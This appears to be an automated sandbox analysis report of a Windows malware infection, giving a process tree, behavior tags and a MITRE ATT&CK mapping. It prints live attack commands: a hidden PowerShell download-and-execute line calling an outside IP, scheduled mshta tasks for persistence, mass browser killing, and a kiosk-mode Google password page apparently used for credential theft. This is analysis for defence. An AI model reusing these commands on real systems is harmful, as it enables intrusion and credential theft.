        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:572
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\1090450021\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090450021\am_no.cmd" any_word
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1868
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2856
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1276
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1928
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:896
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2372
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:788
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "YyZ1kmamKrh" /tr "mshta \"C:\Temp\XS9tf0jz7.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2436
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\XS9tf0jz7.hta"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2284
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:588
- - C:\Users\Admin\AppData\Local\Temp\1090499001\3c859bf5b2.exe
    "C:\Users\Admin\AppData\Local\Temp\1090499001\3c859bf5b2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:828
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2952
- - C:\Users\Admin\AppData\Local\Temp\1090500001\f25e11565c.exe
    "C:\Users\Admin\AppData\Local\Temp\1090500001\f25e11565c.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1716
- - C:\Users\Admin\AppData\Local\Temp\1090501001\41e4355916.exe
    "C:\Users\Admin\AppData\Local\Temp\1090501001\41e4355916.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:2784
- - C:\Users\Admin\AppData\Local\Temp\1090502001\f51a7aa350.exe
    "C:\Users\Admin\AppData\Local\Temp\1090502001\f51a7aa350.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1696
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1120
- - C:\Users\Admin\AppData\Local\Temp\1090503001\44720c9602.exe
    "C:\Users\Admin\AppData\Local\Temp\1090503001\44720c9602.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2896
- - C:\Users\Admin\AppData\Local\Temp\1090504001\7c18fb7ceb.exe
    "C:\Users\Admin\AppData\Local\Temp\1090504001\7c18fb7ceb.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2968
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2340
- - C:\Users\Admin\AppData\Local\Temp\1090505001\a60165c390.exe
    "C:\Users\Admin\AppData\Local\Temp\1090505001\a60165c390.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 896
      4⤵
      Loads dropped DLL
      Program crash
      PID:2436
- - C:\Users\Admin\AppData\Local\Temp\1090506001\d50bc265d4.exe
    "C:\Users\Admin\AppData\Local\Temp\1090506001\d50bc265d4.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:1112
- - C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe
    "C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1900
- - C:\Users\Admin\AppData\Local\Temp\1090509001\094249b63a.exe
    "C:\Users\Admin\AppData\Local\Temp\1090509001\094249b63a.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2228
- - C:\Users\Admin\AppData\Local\Temp\1090510001\6f32fb5c60.exe
    "C:\Users\Admin\AppData\Local\Temp\1090510001\6f32fb5c60.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1828
- - C:\Users\Admin\AppData\Local\Temp\1090511001\8ee8d5c43d.exe
    "C:\Users\Admin\AppData\Local\Temp\1090511001\8ee8d5c43d.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1608
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1824
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1344
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:824
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1520
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2436
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:2280
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2084
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2084.0.1243606303\1822209095" -parentBuildID 20221007134813 -prefsHandle 1232 -prefMapHandle 1224 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f0b8655-25ae-43b3-af76-bd02aba9a9f2} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" 1296 ebdb058 gpu
        6⤵
        
        PID:1460
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2084.1.665158048\1479830347" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6bd3297b-c9a3-4626-8a74-6ed0fc799b02} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" 1512 d74b58 socket
        6⤵
        
        PID:2540
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2084.2.1364178246\1790486600" -childID 1 -isForBrowser -prefsHandle 2112 -prefMapHandle 2108 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b377c32-5ff2-4832-89c9-50702f050db9} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" 2124 1a4ba258 tab
        6⤵
        
        PID:2260
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2084.3.859071188\1583148214" -childID 2 -isForBrowser -prefsHandle 2716 -prefMapHandle 2712 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {79627aab-cb4a-4d21-8b31-a852925ef4df} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" 2728 1c2e2558 tab
        6⤵
        
        PID:1452
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2084.4.1809940199\700584903" -childID 3 -isForBrowser -prefsHandle 3764 -prefMapHandle 3760 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {86e11eaf-ba0d-455f-a86c-0c0e59b166cb} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" 3780 1d8aba58 tab
        6⤵
        
        PID:2960
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2084.5.461559251\1943239914" -childID 4 -isForBrowser -prefsHandle 3896 -prefMapHandle 3900 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2ac6cb7-2631-45d5-a20e-5879824c4cd7} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" 3884 1fb19c58 tab
        6⤵
        
        PID:2780
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2084.6.718890492\727563889" -childID 5 -isForBrowser -prefsHandle 4056 -prefMapHandle 4060 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd0c9424-4864-49ce-bb7f-c7695053b3c4} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" 4048 1fb1a258 tab
        6⤵
        
        PID:2560
- - C:\Users\Admin\AppData\Local\Temp\1090512001\7584b57e33.exe
    "C:\Users\Admin\AppData\Local\Temp\1090512001\7584b57e33.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn f7P0fmaqDA1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Pnu6DaDrJ.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:560
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn f7P0fmaqDA1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Pnu6DaDrJ.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2900
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\Pnu6DaDrJ.hta
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:1544
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'U7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2944
      - C:\Users\Admin\AppData\Local\TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
        
        "C:\Users\Admin\AppData\Local\TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:3592
- - C:\Users\Admin\AppData\Local\Temp\1090513001\964beb63e8.exe
    "C:\Users\Admin\AppData\Local\Temp\1090513001\964beb63e8.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3816
- - C:\Users\Admin\AppData\Local\Temp\1090514001\ftS1RPn.exe
    "C:\Users\Admin\AppData\Local\Temp\1090514001\ftS1RPn.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4016
- - C:\Users\Admin\AppData\Local\Temp\1090515001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1090515001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3216
- - C:\Users\Admin\AppData\Local\Temp\1090516001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1090516001\ebp51gY.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3564
- - C:\Users\Admin\AppData\Local\Temp\1090517001\1c378480ff.exe
    "C:\Users\Admin\AppData\Local\Temp\1090517001\1c378480ff.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3768
- - C:\Users\Admin\AppData\Local\Temp\1090518001\bf1e1b38e9.exe
    "C:\Users\Admin\AppData\Local\Temp\1090518001\bf1e1b38e9.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion